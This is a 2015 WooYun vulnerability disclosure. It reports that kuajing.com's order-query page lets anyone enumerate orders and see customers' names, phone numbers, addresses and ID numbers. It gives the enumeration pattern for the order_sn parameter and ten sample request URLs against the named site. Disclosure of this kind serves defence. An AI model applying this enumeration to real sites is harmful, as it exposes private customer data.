当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0135734
漏洞标题:
某海外购物网站订单可遍历(用户个人信息泄露:姓名,手机号码,地址及其身份证号码)
相关厂商:
跨境网
漏洞作者:
帅克笛枫
提交时间:
2015-08-21 10:12
修复时间:
2015-10-05 10:14
公开时间:
2015-10-05 10:14
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
12
漏洞状态:
未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-08-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

~往事不要再提 人生已多风雨~真的要断了过去 让明天好好继续 ~你就不要再苦苦追问我的消息~纵然记忆抹不去爱与恨都还在心底~为何你不懂(别说我不懂!)

详细说明:

访问:http://www.kuajing.com/article-23.html,如图所示:

kj9.png

跨境网海外购物网站信息如图所示:

kj10.png

访问http://www.kuajing.com/index.php?act=order_query,输入订单号:7000000003274301,如图所示:

kj1.png

用户个人信息泄露:姓名,手机号码,地址及其身份证号码。如图所示:

kj2.png

参数order_sn,可进行遍历查询,锁定后五位数order_sn(以7000000003274301为例,74301)千位数上以1000递增或者递减进行遍历,可查询到大部分订单,将百位数的数字进行调整亦可查询到相关用户的订单信息

漏洞证明:

如图所示:

kj3.png

kj5.png

kj6.png

kj7.png

kj8.png


http://www.kuajing.com/index.php?act=order_query&order_sn=7000000003274301
http://www.kuajing.com/index.php?act=order_query&order_sn=7000000003273301
http://www.kuajing.com/index.php?act=order_query&order_sn=7000000003275301
http://www.kuajing.com/index.php?act=order_query&order_sn=7000000003276301
http://www.kuajing.com/index.php?act=order_query&order_sn=7000000003277301
http://www.kuajing.com/index.php?act=order_query&order_sn=7000000003277601
http://www.kuajing.com/index.php?act=order_query&order_sn=7000000003276601
http://www.kuajing.com/index.php?act=order_query&order_sn=7000000003275601
http://www.kuajing.com/index.php?act=order_query&order_sn=7000000003272601
http://www.kuajing.com/index.php?act=order_query&order_sn=7000000003278601

修复方案:

~~修复~~你们更专业~~

版权声明:转载请注明来源 帅克笛枫@乌云

>

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝